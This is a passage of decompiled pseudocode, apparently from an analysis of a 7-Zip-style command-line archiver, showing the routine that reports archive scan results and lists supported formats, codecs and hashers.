					 *(_t1286 - 0xcc) = _t970;
					 *(_t1286 - 0xc8) = _t970;
					 *(_t1286 - 0xc4) = _t970;
					_t1277 = 0;
					 *(_t1286 - 4) = 8;
					if( *((intOrPtr*)(_t1286 - 0x128)) <= _t970) {
						L26:
						 *(_t1286 - 0x28) = _t970;
						 *(_t1286 - 0x20) = _t970;
						if( *((intOrPtr*)(_t1286 - 0x2f8)) != 8) {
							__eflags =  *((intOrPtr*)(_t1286 - 0x2f8)) - 7;
							if( *((intOrPtr*)(_t1286 - 0x2f8)) != 7) {
								__eflags =  *(_t1286 - 0xd);
								if( *(_t1286 - 0xd) != 0) {
									L113:
									 *((intOrPtr*)(_t1286 - 0x78)) = 0;
									 *((intOrPtr*)(_t1286 - 0x74)) = 0;
									 *((intOrPtr*)(_t1286 - 0x70)) = 0;
									 *(_t1286 - 0x38) = 0;
									 *(_t1286 - 0x34) = 0;
									 *(_t1286 - 0x30) = 0;
									__eflags =  *((char*)(_t1286 - 0x33a));
									_t970 = fputs;
									 *(_t1286 - 4) = 0xc;
									if(__eflags == 0) {
										_push(0xc8);
										E00B48163(_t1286 - 0x43c, __eflags);
										 *((intOrPtr*)(_t1286 - 0x44c)) = 0xb8e058;
										_t601 =  *0xb9a894;
										asm("sbb ecx, ecx");
										 *(_t1286 - 4) = 0xd;
										 *(_t1286 - 0x448) =  ~( *(_t1286 - 0x338)) & _t601;
										 *(_t1286 - 0x444) =  *0xb9a898;
										 *(_t1286 - 0x398) =  *(_t1286 - 0x18);
										__eflags = _t601;
										 *((intOrPtr*)(_t1286 - 0x390)) =  *(_t1286 - 0x14) - 1;
										if(_t601 != 0) {
											__eflags =  *(_t1286 - 0x338);
											if( *(_t1286 - 0x338) != 0) {
												fputs("Scanning the drive for archives:",  *_t601); // executed
												E00B11FE9(_t601);
											}
										}
										 *((intOrPtr*)(_t1286 - 0xac)) = 0;
										 *((intOrPtr*)(_t1286 - 0xa8)) = 0;
										 *((intOrPtr*)(_t1286 - 0xa4)) = 0;
										 *((intOrPtr*)(_t1286 - 0xa0)) = 0;
										 *((intOrPtr*)(_t1286 - 0x9c)) = 0;
										 *((intOrPtr*)(_t1286 - 0x98)) = 0;
										 *(_t1286 - 0x94) = 0;
										 *(_t1286 - 0x90) = 0;
										 *((intOrPtr*)(_t1286 - 0x8c)) = 0;
										 *(_t1286 - 0x88) = 0;
										 *(_t1286 - 0x84) = 0;
										 *(_t1286 - 0x80) = 0;
										E00B44249(_t1286 - 0x44c);
										_t603 = E00B12D90(_t1286 - 0x60);
										_push(_t1286 - 0x44c);
										_push(_t1286 - 0xac);
										_push(_t1286 - 0x38);
										_push(_t1286 - 0x78);
										_push(_t603);
										 *(_t1286 - 4) = 0xe;
										_t604 = E00B30621(_t970, _t1286 - 0x2cc, 0, 0, __eflags); // executed
										 *(_t1286 - 0x20) = _t604;
										 *(_t1286 - 4) = 0xd;
										E00B11E89(_t604,  *((intOrPtr*)(_t1286 - 0x60)));
										__eflags =  *(_t1286 - 0x398);
										if( *(_t1286 - 0x398) != 0) {
											E00B4B618(_t1286 - 0x43c, 0, 1); // executed
										}
										__eflags =  *(_t1286 - 0x20);
										if( *(_t1286 - 0x20) == 0) {
											__eflags =  *(_t1286 - 0x338);
											if( *(_t1286 - 0x338) != 0) {
												_push(_t1286 - 0xac); // executed
												E00B445E7(_t1286 - 0x44c); // executed
											}
										}
										 *(_t1286 - 4) = 0xc;
										L00B4B57F(_t1286 - 0x43c);
										__eflags =  *(_t1286 - 0x20);
										if( *(_t1286 - 0x20) != 0) {
											L190:
											 *(_t1286 - 4) = 0xb;
											L00B41B84(_t970, _t1286 - 0x38);
											 *(_t1286 - 4) = 8;
											L00B41B84(_t970, _t1286 - 0x78);
											goto L191;
										} else {
											L124:
											__eflags =  *(_t1286 - 0xd);
											if(__eflags == 0) {
												_push(_t1286 - 0x5c);
												_push(_t1286 - 0x50);
												_push(_t1286 - 0x2a4);
												 *(_t1286 - 0x24) =  *((intOrPtr*)(_t1286 - 0x308));
												_push(_t1286 - 0x2e4);
												 *((char*)(_t1286 - 0x23)) =  *((intOrPtr*)(_t1286 - 0x307));
												_push(_t1286 - 0x2e8);
												 *(_t1286 - 0x50) = 0;
												_push( *((intOrPtr*)(_t1286 - 0x335)));
												 *(_t1286 - 0x4c) = 0;
												 *(_t1286 - 0x5c) = 0;
												 *(_t1286 - 0x58) = 0;
												_push( *(_t1286 - 0x338));
												_push( *((intOrPtr*)( *((intOrPtr*)(_t1286 - 0x314)))) + 0xc);
												_push( *((intOrPtr*)(_t1286 - 0x331)));
												_push( *((intOrPtr*)(_t1286 - 0x270)));
												_push(_t1286 - 0x38);
												_push(_t1286 - 0x78);
												_push( *((intOrPtr*)(_t1286 - 0x33a)));
												_push(_t1286 - 0xcc);
												_push(_t1286 - 0xc0);
												_t628 = L00B4752C(_t1286 - 0x24,  *((intOrPtr*)(_t1286 - 0x2c)), __eflags);
												__eflags =  *(_t1286 - 0x338);
												 *(_t1286 - 0x20) = _t628;
												if( *(_t1286 - 0x338) == 0) {
													L185:
													__eflags =  *(_t1286 - 0x4c);
													if( *(_t1286 - 0x4c) > 0) {
														L187:
														__eflags =  *(_t1286 - 0x338);
														if( *(_t1286 - 0x338) != 0) {
															E00B11FE9(0xb9a5b0);
															 *_t970("Errors: ",  *0xb9a5b0);
															E00B11FE9(E00B1224A(0xb9a5b0,  *(_t1286 - 0x50),  *(_t1286 - 0x4c)));
														}
														 *(_t1286 - 0x28) = 2;
														goto L190;
													}
													__eflags =  *(_t1286 - 0x50);
													if( *(_t1286 - 0x50) <= 0) {
														goto L190;
													}
													goto L187;
												}
												__eflags =  *(_t1286 - 0x58);
												if( *(_t1286 - 0x58) > 0) {
													L184:
													E00B11FE9(0xb9a5b0);
													 *_t970("Warnings: ",  *0xb9a5b0);
													E00B11FE9(E00B1224A(0xb9a5b0,  *(_t1286 - 0x5c),  *(_t1286 - 0x58)));
													goto L185;
												}
												__eflags =  *(_t1286 - 0x5c);
												if( *(_t1286 - 0x5c) <= 0) {
													goto L185;
												}
												goto L184;
											}
											_push(0x170);
											_t637 = E00B11E55();
											 *(_t1286 - 0x58) = _t637;
											__eflags = _t637;
											 *(_t1286 - 4) = 0xf;
											if(__eflags == 0) {
												_t1280 = 0;
												__eflags = 0;
											} else {
												_t1280 = L00B49F2E(_t637, __eflags);
											}
											__eflags = _t1280;
											 *(_t1286 - 4) = 0xc;
											 *(_t1286 - 0x58) = _t1280;
											if(_t1280 != 0) {
												 *((intOrPtr*)( *_t1280 + 4))(_t1280);
											}
											_t378 = _t1280 + 0xdc; // 0xdc
											 *((char*)(_t1280 + 0xda)) =  *((intOrPtr*)(_t1286 - 0x2e8));
											 *(_t1286 - 4) = 0x10;
											L00B12F78(_t378, _t1286 - 0x2e4);
											_t641 = E00B4A0AB(_t1280,  *0xb9a894,  *0xb9a898,  *(_t1286 - 0x18));
											__eflags =  *((intOrPtr*)(_t1286 - 0x74)) - 1;
											__eflags =  *(_t1286 - 0x18);
											 *((char*)(_t1280 + 0xd9)) = _t641 & 0xffffff00 |  *((intOrPtr*)(_t1286 - 0x74)) - 0x00000001 > 0x00000000;
											 *((intOrPtr*)(_t1280 + 0x168)) =  *((intOrPtr*)(_t1286 - 0x114));
											 *(_t1280 + 0x164) =  *(_t1286 - 0x1c);
											if(__eflags != 0) {
												_t756 =  *(_t1286 - 0x14) - 1;
												__eflags = _t756;
												 *(_t1280 + 0xc4) = _t756;
											}
											L00B49B35(_t1286 - 0x38c, __eflags);
											_push(_t1286 - 0x298);
											 *(_t1286 - 4) = 0x11;
											E00B4AD72(_t1286 - 0x38c);
											__eflags =  *((intOrPtr*)(_t1286 - 0x2f8)) - 3;
											 *((char*)(_t1286 - 0x350)) =  *((intOrPtr*)(_t1286 - 0x33a));
											_t649 =  *((intOrPtr*)(_t1286 - 0x337));
											 *(_t1286 - 0x34e) = _t649;
											 *(_t1286 - 0x34f) = _t649;
											 *((char*)(_t1286 - 0x34d)) = _t649 & 0xffffff00 |  *((intOrPtr*)(_t1286 - 0x2f8)) == 0x00000003;
											E00B22722(_t1286 - 0x34c, _t1286 - 0x2a4);
											E00B12D90(_t1286 - 0x54);
											 *(_t1286 - 4) = 0x12;
											L00B3315C(_t1286 - 0x3ec);
											__eflags =  *(_t1286 - 0x2d4);
											 *(_t1286 - 4) = 0x13;
											 *(_t1286 - 0x1c) = 0;
											if( *(_t1286 - 0x2d4) != 0) {
												 *(_t1286 - 0x1c) = _t1286 - 0x3ec;
												_push(_t1286 - 0x2d8);
												E00B4A7A1(E00B3255B(_t1286 - 0x3ec));
											}
											_push(_t1286 - 0xb4);
											_push(_t1286 - 0x54);
											_push( *(_t1286 - 0x1c));
											_t423 = _t1280 + 4; // 0x4
											asm("sbb ecx, ecx");
											_push(_t1280);
											_push( ~_t1280 & _t423);
											asm("sbb edx, edx");
											_t424 = _t1280 + 0x10; // 0x10
											_push( ~_t1280 & _t424);
											_push(_t1286 - 0x38c);
											_push( *((intOrPtr*)( *((intOrPtr*)(_t1286 - 0x314)))) + 0xc);
											_push(_t1286 - 0x38);
											_push(_t1286 - 0x78);
											_push(_t1286 - 0xcc);
											_t661 = E00B30E95( *((intOrPtr*)(_t1286 - 0x2c)), _t1286 - 0xc0); // executed
											__eflags =  *(_t1280 + 0xbc);
											 *(_t1286 - 0x20) = _t661;
											if( *(_t1280 + 0xbc) != 0) {
												_t433 = _t1280 + 0x18; // 0x18
												E00B4B618(_t433, 0, 1);
											}
											__eflags =  *(_t1286 - 0x50);
											if( *(_t1286 - 0x50) != 0) {
												_t743 =  *0xb9a898; // 0xb9a5a0
												__eflags = _t743;
												if(__eflags != 0) {
													 *(_t1286 - 0x14) = _t743;
													E00B11FE9(_t743);
													fputs("ERROR:",  *( *(_t1286 - 0x14)));
													E00B11FE9( *(_t1286 - 0x14));
													_push( *((intOrPtr*)(_t1286 - 0x54)));
													E00B11FE9(L00B11FFC( *(_t1286 - 0x14), __eflags));
												}
												__eflags =  *(_t1286 - 0x20);
												if( *(_t1286 - 0x20) == 0) {
													 *(_t1286 - 0x20) = 0x80004005;
												}
											}
											_t1273 =  *0xb9a894; // 0xb9a5b0
											 *(_t1286 - 0xd) =  *(_t1286 - 0xd) & 0x00000000;
											__eflags = _t1273;
											if(_t1273 == 0) {
												L145:
												__eflags =  *(_t1280 + 0x128) |  *(_t1280 + 0x12c);
												if(( *(_t1280 + 0x128) |  *(_t1280 + 0x12c)) != 0) {
													__eflags = _t1273;
													 *(_t1286 - 0xd) = 1;
													if(_t1273 != 0) {
														fputs("Can\'t open as archive: ",  *_t1273);
														E00B11FE9(E00B1224A(_t1273,  *(_t1280 + 0x128),  *(_t1280 + 0x12c)));
													}
												}
												__eflags =  *(_t1280 + 0x130) |  *(_t1280 + 0x134);
												if(( *(_t1280 + 0x130) |  *(_t1280 + 0x134)) == 0) {
													L151:
													__eflags = _t1273;
													if(_t1273 != 0) {
														_t461 = _t1280 + 0x138; // 0x138
														_t716 = _t461;
														__eflags =  *(_t1280 + 0x138) |  *(_t716 + 4);
														if(( *(_t1280 + 0x138) |  *(_t716 + 4)) != 0) {
															fputs("Archives with Warnings: ",  *_t1273);
															_t463 = _t1280 + 0x138; // 0x138
															E00B11FE9(E00B1224A(_t1273,  *_t463,  *((intOrPtr*)(_t463 + 4))));
														}
														__eflags =  *(_t1280 + 0x148) |  *(_t1280 + 0x14c);
														if(( *(_t1280 + 0x148) |  *(_t1280 + 0x14c)) != 0) {
															E00B11FE9(_t1273);
															__eflags =  *(_t1280 + 0x148) |  *(_t1280 + 0x14c);
															if(( *(_t1280 + 0x148) |  *(_t1280 + 0x14c)) != 0) {
																fputs("Warnings: ",  *_t1273);
																E00B11FE9(E00B1224A(_t1273,  *(_t1280 + 0x148),  *(_t1280 + 0x14c)));
															}
														}
													}
													goto L157;
												} else {
													__eflags = _t1273;
													 *(_t1286 - 0xd) = 1;
													if(_t1273 == 0) {
														L157:
														__eflags =  *(_t1280 + 0x140) |  *(_t1280 + 0x144);
														if(( *(_t1280 + 0x140) |  *(_t1280 + 0x144)) == 0) {
															L161:
															__eflags =  *(_t1286 - 0xd);
															if( *(_t1286 - 0xd) == 0) {
																L163:
																__eflags = _t1273;
																if(_t1273 == 0) {
																	L179:
																	 *(_t1286 - 4) = 0x12;
																	E00B11E89(L00B331CA(_t1286 - 0x3ec),  *((intOrPtr*)(_t1286 - 0x54)));
																	 *(_t1286 - 4) = 0x14;
																	L00B4AF38(_t1286 - 0x34c);
																	 *(_t1286 - 4) = 0x10;
																	L00B49BB1(_t1286 - 0x38c);
																	__eflags = _t1280;
																	 *(_t1286 - 4) = 0xc;
																	if(_t1280 != 0) {
																		 *((intOrPtr*)( *_t1280 + 8))(_t1280);
																	}
																	goto L190;
																}
																__eflags =  *(_t1280 + 0x130) |  *(_t1280 + 0x134);
																if(( *(_t1280 + 0x130) |  *(_t1280 + 0x134)) != 0) {
																	L177:
																	E00B11FE9(_t1273);
																	_t514 = _t1280 + 0x150; // 0x150
																	_t677 = _t514;
																	__eflags =  *(_t1280 + 0x150) |  *(_t677 + 4);
																	if(( *(_t1280 + 0x150) |  *(_t677 + 4)) != 0) {
																		fputs("Sub items Errors: ",  *_t1273);
																		_t516 = _t1280 + 0x150; // 0x150
																		E00B11FE9(E00B1224A(_t1273,  *_t516,  *((intOrPtr*)(_t516 + 4))));
																	}
																	goto L179;
																}
																_t483 = _t1280 + 0x150; // 0x150
																_t682 = _t483;
																__eflags =  *(_t1280 + 0x150) |  *(_t682 + 4);
																if(( *(_t1280 + 0x150) |  *(_t682 + 4)) != 0) {
																	goto L177;
																}
																__eflags =  *(_t1286 - 0x20);
																if( *(_t1286 - 0x20) != 0) {
																	goto L179;
																}
																_t683 =  *(_t1286 - 0x94);
																__eflags = _t683 |  *(_t1286 - 0x90);
																if((_t683 |  *(_t1286 - 0x90)) != 0) {
																	fputs("Folders: ",  *_t1273);
																	E00B11FE9(E00B1224A(_t1273,  *(_t1286 - 0x94),  *(_t1286 - 0x90)));
																	_t683 =  *(_t1286 - 0x94);
																}
																__eflags =  *((intOrPtr*)(_t1286 - 0x8c)) - 1;
																if( *((intOrPtr*)(_t1286 - 0x8c)) != 1) {
																	L173:
																	fputs("Files: ",  *_t1273); // executed
																	_t685 = E00B1224A(_t1273,  *((intOrPtr*)(_t1286 - 0x8c)),  *(_t1286 - 0x88)); // executed
																	E00B11FE9(_t685);
																	__eflags =  *(_t1286 - 0x84) |  *(_t1286 - 0x80);
																	if(( *(_t1286 - 0x84) |  *(_t1286 - 0x80)) != 0) {
																		fputs("Alternate Streams: ",  *_t1273);
																		E00B11FE9(E00B1224A(_t1273,  *(_t1286 - 0x84),  *(_t1286 - 0x80)));
																		fputs("Alternate Streams Size: ",  *_t1273);
																		E00B11FE9(E00B1224A(_t1273,  *((intOrPtr*)(_t1286 - 0xa4)),  *((intOrPtr*)(_t1286 - 0xa0))));
																	}
																	goto L175;
																} else {
																	__eflags =  *(_t1286 - 0x88);
																	if( *(_t1286 - 0x88) != 0) {
																		goto L173;
																	}
																	__eflags = _t683 |  *(_t1286 - 0x90);
																	if((_t683 |  *(_t1286 - 0x90)) != 0) {
																		goto L173;
																	}
																	__eflags =  *(_t1286 - 0x84) |  *(_t1286 - 0x80);
																	if(( *(_t1286 - 0x84) |  *(_t1286 - 0x80)) == 0) {
																		L175:
																		fputs("Size:       ",  *_t1273); // executed
																		_t690 = E00B1224A(_t1273,  *((intOrPtr*)(_t1286 - 0xac)),  *((intOrPtr*)(_t1286 - 0xa8))); // executed
																		 *(_t1286 - 0x24) = _t690;
																		E00B11FE9(_t690);
																		fputs("Compressed: ",  *( *(_t1286 - 0x24))); // executed
																		_t694 = E00B1224A( *(_t1286 - 0x24),  *((intOrPtr*)(_t1286 - 0x9c)),  *((intOrPtr*)(_t1286 - 0x98))); // executed
																		E00B11FE9(_t694);
																		__eflags =  *(_t1286 - 0x1c);
																		if( *(_t1286 - 0x1c) != 0) {
																			E00B11FE9(_t1273);
																			L00B45F3D(_t1273, _t1286 - 0x3ec);
																		}
																		goto L179;
																	}
																	goto L173;
																}
															}
															L162:
															 *(_t1286 - 0x28) = 2;
															goto L163;
														}
														__eflags = _t1273;
														 *(_t1286 - 0xd) = 1;
														if(_t1273 == 0) {
															goto L162;
														}
														E00B11FE9(_t1273);
														__eflags =  *(_t1280 + 0x140) |  *(_t1280 + 0x144);
														if(( *(_t1280 + 0x140) |  *(_t1280 + 0x144)) == 0) {
															goto L162;
														}
														fputs("Open Errors: ",  *_t1273);
														E00B11FE9(E00B1224A(_t1273,  *(_t1280 + 0x140),  *(_t1280 + 0x144)));
														goto L161;
													}
													fputs("Archives with Errors: ",  *_t1273);
													E00B11FE9(E00B1224A(_t1273,  *(_t1280 + 0x130),  *(_t1280 + 0x134)));
													goto L151;
												}
											} else {
												E00B11FE9(_t1273);
												__eflags =  *(_t1280 + 0x114);
												if( *(_t1280 + 0x114) > 0) {
													L144:
													fputs("Archives: ",  *_t1273);
													_t446 = _t1280 + 0x110; // 0x110
													E00B11FE9(E00B1224A(_t1273,  *_t446,  *((intOrPtr*)(_t446 + 4))));
													fputs("OK archives: ",  *_t1273);
													E00B11FE9(E00B1224A(_t1273,  *((intOrPtr*)(_t1280 + 0x120)),  *((intOrPtr*)(_t1280 + 0x124))));
													goto L145;
												}
												__eflags =  *((intOrPtr*)(_t1280 + 0x110)) - 1;
												if( *((intOrPtr*)(_t1280 + 0x110)) <= 1) {
													goto L145;
												}
												goto L144;
											}
										}
									}
									E00B56B33(_t1286 - 0x78);
									_push(_t1286 - 0x2b0);
									E00B11524(_t1286 - 0x78);
									E00B56B33(_t1286 - 0x38);
									_push(_t1286 - 0x2b0);
									E00B11524(_t1286 - 0x38);
									goto L124;
								}
								__eflags =  *((intOrPtr*)(_t1286 - 0x2f8)) - 6;
								if( *((intOrPtr*)(_t1286 - 0x2f8)) == 6) {
									goto L113;
								}
								_t771 = E00B207CE(_t1286 - 0x2f8);
								__eflags = _t771;
								if(_t771 == 0) {
									__eflags =  *((intOrPtr*)(_t1286 - 0x2f8)) - 9;
									if(__eflags != 0) {
										_t1257 = 7;
										E00B4A393(_t1257);
									} else {
										E00B4A32A(_t1286 - 0x5ac, __eflags);
										__eflags =  *(_t1286 - 0x18) - _t970;
										 *(_t1286 - 4) = 0x19;
										if( *(_t1286 - 0x18) != _t970) {
											_t795 =  *(_t1286 - 0x14) - 1;
											__eflags = _t795;
											 *(_t1286 - 0x4f8) = _t795;
										}
										_t1282 =  *0xb9a898; // 0xb9a5a0
										_t1274 =  *0xb9a894; // 0xb9a5b0
										E00B36CB9(_t1286 - 0x4c8);
										 *(_t1286 - 0x500) =  *(_t1286 - 0x18);
										 *((char*)(_t1286 - 0x473)) =  *(_t1286 - 0x338);
										 *(_t1286 - 0x4b8) = _t970;
										 *(_t1286 - 0x4f4) = _t1274;
										 *(_t1286 - 0x4f0) = _t1282;
										E00B127B7(_t1286 - 0x470, _t1286 - 0x324);
										E00B126D9(_t1286 - 0x38);
										_push(_t1286 - 0x5ac);
										_push(_t1286 - 0x38);
										 *(_t1286 - 4) = 0x1a;
										 *(_t1286 - 0x20) = E00B32B6F(_t1286 - 0x314, _t1286 - 0x150, __eflags);
										L00B49BC8(_t1286 - 0x98, __eflags);
										 *(_t1286 - 4) = 0x1b;
										E00B127B7(_t1286 - 0x94, _t1286 - 0x38);
										_t786 =  *0xb9a894; // 0xb9a5b0
										_t1144 = _t786;
										__eflags = _t1144 - _t970;
										if(_t1144 == _t970) {
											_t1144 =  *0xb9a898; // 0xb9a5a0
										}
										_push( *(_t1286 - 0x338));
										_push(_t1144);
										_push(_t786);
										_push(_t1286 - 0x98);
										asm("sbb edx, edx");
										 *(_t1286 - 0x28) = E00B4A4DF( *(_t1286 - 0x20),  ~(_t1286 - 0x5ac) & _t1286 - 0x000005a4);
										 *(_t1286 - 4) = 0x1c;
										E00B11E89(E00B11E89(L00B41B84(_t970, _t1286 - 0x88),  *(_t1286 - 0x94)),  *(_t1286 - 0x38));
										 *(_t1286 - 4) = 8;
										E00B4AE2C(_t970, _t1286 - 0x5ac);
									}
									goto L191;
								}
								__eflags =  *((char*)(_t1286 - 0x257));
								if(__eflags != 0) {
									__eflags =  *((intOrPtr*)(_t1286 - 0x198)) - _t970;
									if(__eflags == 0) {
										L00B13076(_t1286 - 0x19c, "7zCon.sfx");
									}
								}
								E00B48102(_t1286 - 0x464, __eflags);
								_t797 =  *0xb9a894; // 0xb9a5b0
								_t1283 =  *(_t1286 - 0x18);
								__eflags =  *((char*)(_t1286 - 0x2e8));
								 *(_t1286 - 0x3ac) = _t797;
								_t798 =  *0xb9a898; // 0xb9a5a0
								 *(_t1286 - 4) = 0x15;
								 *(_t1286 - 0x3a8) = _t798;
								 *(_t1286 - 0x3b8) = _t1283;
								if( *((char*)(_t1286 - 0x2e8)) == 0) {
									L94:
									_t219 = _t1286 - 0xd;
									 *_t219 =  *(_t1286 - 0xd) & 0x00000000;
									__eflags =  *_t219;
									goto L95;
								} else {
									__eflags =  *((intOrPtr*)(_t1286 - 0x2e0)) - _t970;
									if( *((intOrPtr*)(_t1286 - 0x2e0)) == _t970) {
										goto L94;
									}
									 *(_t1286 - 0xd) = 1;
									L95:
									 *((char*)(_t1286 - 0x39a)) =  *(_t1286 - 0xd);
									L00B12F78(_t1286 - 0x398, _t1286 - 0x2e4);
									E00B4A19D(_t1286 - 0x594, __eflags);
									__eflags = _t1283 - _t970;
									 *((intOrPtr*)(_t1286 - 0x4cc)) =  *((intOrPtr*)(_t1286 - 0x114));
									 *(_t1286 - 4) = 0x16;
									 *(_t1286 - 0x4d0) =  *(_t1286 - 0x1c);
									if(_t1283 != _t970) {
										_t829 =  *(_t1286 - 0x14) - 1;
										__eflags = _t829;
										 *(_t1286 - 0x4e0) = _t829;
									}
									__eflags =  *((char*)(_t1286 - 0x2e8));
									 *((char*)(_t1286 - 0x473)) =  *(_t1286 - 0xd);
									if( *((char*)(_t1286 - 0x2e8)) == 0) {
										L100:
										_t238 = _t1286 - 0x472;
										 *_t238 =  *(_t1286 - 0x472) & 0x00000000;
										__eflags =  *_t238;
										goto L101;
									} else {
										__eflags =  *((intOrPtr*)(_t1286 - 0x2e0)) - _t970;
										if( *((intOrPtr*)(_t1286 - 0x2e0)) != _t970) {
											goto L100;
										}
										 *(_t1286 - 0x472) = 1;
										L101:
										L00B12F78(_t1286 - 0x470, _t1286 - 0x2e4);
										_t1284 =  *0xb9a898; // 0xb9a5a0
										_t970 =  *0xb9a894; // 0xb9a5b0
										 *((char*)(_t1286 - 0x4d4)) =  *((intOrPtr*)(_t1286 - 0x252));
										E00B36CB9(_t1286 - 0x4b0);
										 *(_t1286 - 0x4a0) =  *(_t1286 - 0x4a0) & 0x00000000;
										 *(_t1286 - 0x4dc) = _t970;
										 *(_t1286 - 0x4d8) = _t1284;
										 *(_t1286 - 0x4e8) =  *(_t1286 - 0x18);
										L00B49BC8(_t1286 - 0x48, __eflags);
										 *(_t1286 - 4) = 0x17;
										_t818 = E00B3E6A7(_t1270, _t1286 - 0xc0, _t1286 - 0x2f4, _t1286 - 0x314, _t1286 - 0x258, _t1286 - 0x48, _t1286 - 0x464, _t1286 - 0x594, 1);
										__eflags =  *(_t1286 - 0x4e8);
										 *(_t1286 - 0x20) = _t818;
										if( *(_t1286 - 0x4e8) != 0) {
											E00B4B618(_t1286 - 0x58c, _t1270, 1);
										}
										_t819 =  *0xb9a894; // 0xb9a5b0
										_t1157 = _t819;
										__eflags = _t1157;
										if(_t1157 == 0) {
											_t1157 =  *0xb9a898; // 0xb9a5a0
										}
										_push(1);
										_push(_t1157);
										_push(_t819);
										_push(_t1286 - 0x48);
										asm("sbb edx, edx");
										 *(_t1286 - 0x28) = E00B4A4DF( *(_t1286 - 0x20),  ~(_t1286 - 0x594) & _t1286 - 0x0000058c);
										 *(_t1286 - 4) = 0x18;
										E00B11E89(L00B41B84(_t970, _t1286 - 0x38),  *(_t1286 - 0x44));
										 *(_t1286 - 4) = 0x15;
										E00B4ADD8(_t970, _t1286 - 0x594);
										 *(_t1286 - 4) = 8;
										E00B4823A(_t1286 - 0x464);
										goto L191;
									}
								}
							}
							_t1285 =  *0xb9a894; // 0xb9a5b0
							__eflags = _t1285 - _t970;
							if(_t1285 == _t970) {
								_t1285 = 0xb9a5b0;
							}
							_t831 = E00B441C3(_t1286 - 0x2a4,  *((intOrPtr*)(_t1286 - 0x110)),  *_t1285);
							__eflags = _t831 - 1;
							 *(_t1286 - 0x20) = _t831;
							if(_t831 == 1) {
								E00B11FE9(_t1285);
								_t833 =  *0xb9a898; // 0xb9a5a0
								__eflags = _t833 - _t970;
								if(_t833 != _t970) {
									fputs("\nDecoding ERROR\n",  *_t833);
								}
								 *(_t1286 - 0x28) = 2;
								 *(_t1286 - 0x20) = _t970;
							}
							goto L191;
						} else {
							_t1277 =  *0xb9a894; // 0xb9a5b0
							if(_t1277 == _t970) {
								_t1277 = 0xb9a5b0;
							}
							E00B11FE9(_t1277);
							fputs("Formats:",  *_t1277);
							E00B11FE9(_t1277);
							 *((intOrPtr*)(_t1286 - 0x7c)) = strlen("KSNFMGOPBELHXCc+a+m+r+");
							 *_t1288 = "wudn";
							_t839 = strlen(??);
							_t1310 =  *((intOrPtr*)(_t1270 + 0xc)) - _t970;
							_t1270 = fputc;
							 *(_t1286 - 0x4c) = _t839;
							 *(_t1286 - 0x18) = _t970;
							if(_t1310 <= 0) {
								L68:
								E00B11FE9(_t1277);
								fputs("Codecs:",  *_t1277);
								E00B11FE9(_t1277);
								 *(_t1286 - 0x18) =  *(_t1286 - 0x18) & 0x00000000;
								if( *0xb9a710 <= 0) {
									L74:
									E00B11FE9(_t1277);
									fputs("Hashers:",  *_t1277);
									E00B11FE9(_t1277);
									 *(_t1286 - 0x18) =  *(_t1286 - 0x18) & 0x00000000;
									if( *0xb9a714 <= 0) {
										L191:
										if( *((char*)(_t1286 - 0x334)) != 0 &&  *0xb9a894 != 0) {
											E00B4A7BC();
										}
										E00B11E89(E00B4A7A1( *(_t1286 - 0x20)),  *(_t1286 - 0xcc));
										 *(_t1286 - 4) = 6;
										E00B32046(_t1286 - 0xc0);
										_t612 =  *((intOrPtr*)(_t1286 - 0x2c));
										 *(_t1286 - 4) = 4;
										_t1347 = _t612;
										if(_t612 != 0) {
											_t612 =  *((intOrPtr*)( *_t612 + 8))(_t612);
										}
										 *(_t1286 - 4) = 2;
										E00B11E89(_t612,  *((intOrPtr*)(_t1286 - 0xdc)));
										L00B111C2(_t1286 - 0x108);
										 *(_t1286 - 4) =  *(_t1286 - 4) & 0x00000000;
										E00B4AC40(_t970, _t1286 - 0x340, _t1347);
										 *(_t1286 - 4) =  *(_t1286 - 4) | 0xffffffff;
										L00B41B84(_t970, _t1286 - 0x6c);
										_t617 =  *(_t1286 - 0x28);
										 *[fs:0x0] =  *((intOrPtr*)(_t1286 - 0xc));
										return _t617;
									}
									 *(_t1286 - 0x14) = 0xb9a5d0;
									do {
										_t972 =  *( *(_t1286 - 0x14));
										E00B4A484(_t1277, _t1248 | 0xffffffff);
										_t1248 =  *(_t972 + 0x14);
										E00B4A41D(_t1277,  *(_t972 + 0x14), 4);
										 *_t1270(0x20,  *_t1277);
										E00B4AC18(_t1277,  *((intOrPtr*)(_t972 + 8)),  *((intOrPtr*)(_t972 + 0xc)));
										 *_t1270(0x20,  *_t1277);
										_t970 =  *(_t972 + 0x10);
										fputs( *(_t972 + 0x10),  *_t1277);
										_t1288 = _t1288 + 0x10;
										E00B11FE9(_t1277);
										 *(_t1286 - 0x18) =  *(_t1286 - 0x18) + 1;
										 *(_t1286 - 0x14) =  *(_t1286 - 0x14) + 4;
										_t1344 =  *(_t1286 - 0x18) -  *0xb9a714; // 0x3
									} while (_t1344 < 0);
									goto L191;
								}
								 *(_t1286 - 0x14) = 0xb9a610;
								do {
									_t1248 = _t1248 | 0xffffffff;
									_t973 =  *( *(_t1286 - 0x14));
									E00B4A484(_t1277, _t1248);
									_t857 =  *((intOrPtr*)(_t973 + 0x14));
									if( *((intOrPtr*)(_t973 + 0x14)) != 1) {
										_t858 = E00B12221(_t1277, _t857);
									} else {
										_t858 =  *_t1270(0x20,  *_t1277);
									}
									_t864 =  *_t1270(((_t858 & 0xffffff00 |  *((intOrPtr*)(_t973 + 4)) == 0x00000000) - 0x00000001 & 0x00000025) + 0x00000020 & 0x000000ff,  *_t1277);
									_t870 =  *_t1270(((_t864 & 0xffffff00 |  *_t973 == 0x00000000) - 0x00000001 & 0x00000024) + 0x00000020 & 0x000000ff,  *_t1277);
									 *_t1270(((_t870 & 0xffffff00 |  *((char*)(_t973 + 0x18)) == 0x00000000) - 0x00000001 & 0x00000026) + 0x00000020 & 0x000000ff,  *_t1277);
									 *_t1270(0x20,  *_t1277);
									E00B4AC18(_t1277,  *((intOrPtr*)(_t973 + 8)),  *((intOrPtr*)(_t973 + 0xc)));
									 *_t1270(0x20,  *_t1277);
									_t970 =  *(_t973 + 0x10);
									fputs( *(_t973 + 0x10),  *_t1277);
									_t1288 = _t1288 + 0x30;
									E00B11FE9(_t1277);
									 *(_t1286 - 0x18) =  *(_t1286 - 0x18) + 1;
									 *(_t1286 - 0x14) =  *(_t1286 - 0x14) + 4;
									_t1342 =  *(_t1286 - 0x18) -  *0xb9a710; // 0x10
								} while (_t1342 < 0);
								goto L74;
							}
							L30:
							_t970 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1286 - 0x2c)) + 8)) +  *(_t1286 - 0x18) * 4);
